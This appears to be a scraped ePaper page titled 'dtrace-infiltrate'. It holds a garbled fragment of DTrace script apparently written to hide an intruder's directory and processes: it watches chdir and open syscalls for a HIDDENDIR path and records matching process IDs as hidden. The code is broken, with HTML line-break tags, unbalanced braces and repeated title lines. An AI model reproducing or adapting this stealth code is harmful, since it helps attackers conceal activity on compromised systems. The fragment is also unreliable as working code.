dtrace-infiltrate
dtrace-infiltrate
dtrace-infiltrate
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
hiddenpids[]<br />
syscall::chdir:entry<br />
/arg0 && strstr(copyinstr(arg0,200),HIDDENDIR) != 0/<br />
{<br />
printf("[+] Someone chdir()'ed to our dir, hope it was us :( adding pid to<br />
hiddenpids: %i\n",pid);<br />
hiddenpids[pid] = 1;<br />
}<br />
syscall::open*:return<br />
/(strstr(fds[arg1].fi_pathname+2,HIDDENDIR) != 0) && !hiddenpids[pid]/<br />
hiddenpids[pid] = arg1;<br />
}